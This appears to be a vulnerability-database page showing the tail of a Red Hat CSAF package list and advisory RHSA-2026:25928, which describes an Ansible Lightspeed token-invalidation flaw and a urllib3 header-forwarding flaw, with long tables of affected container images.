"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-debugsource-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-drac5-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eaton-snmp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-emerson-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-eps-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-gce-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-heuristics-ping-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-hpblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-powervs-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibm-vpc-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ibmblade-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ifmib-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-moonshot-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-mp-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo-ssh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ilo2-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-intelmodular-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipdu-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-ipmilan-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kdump-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-kubevirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-lpar-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-mpath-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-nutanix-ahv-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-openstack-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.aarch64",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.ppc64le",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-agents-redfish-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-agents-rhevm-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsa-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-rsb-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-sbd-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-scsi-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-virsh-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-rest-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-vmware-soap-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-wti-0:4.16.0-21.el10_2.2.noarch",
"AppStream-10.2.Z:fence-agents-zvm-0:4.16.0-21.el10_2.2.s390x",
"AppStream-10.2.Z:fence-virt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-cpg-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-libvirt-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-multicast-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-serial-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:fence-virtd-tcp-debuginfo-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-0:4.16.0-21.el10_2.2.x86_64",
"AppStream-10.2.Z:ha-cloud-support-debuginfo-0:4.16.0-21.el10_2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
}
]
}
RHSA-2026:25928
Vulnerability from csaf_redhat - Published: 2026-06-15 08:51 - Updated: 2026-06-16 21:44A flaw was found in Ansible Lightspeed. This vulnerability, related to insufficient session expiration, allows a remote attacker to maintain persistent access to the Ansible Lightspeed instance. If an attacker exfiltrates a valid OAuth (Open Authorization) access token before a user logs out, they can continue to authenticate and access sensitive data. This is because the application fails to invalidate the token on the backend, leaving it valid until its natural expiration. This can lead to unauthorized read access to Ansible resources such as inventories, playbooks, and configuration data.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64 | — |
Workaround
|
A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64 | — | ||
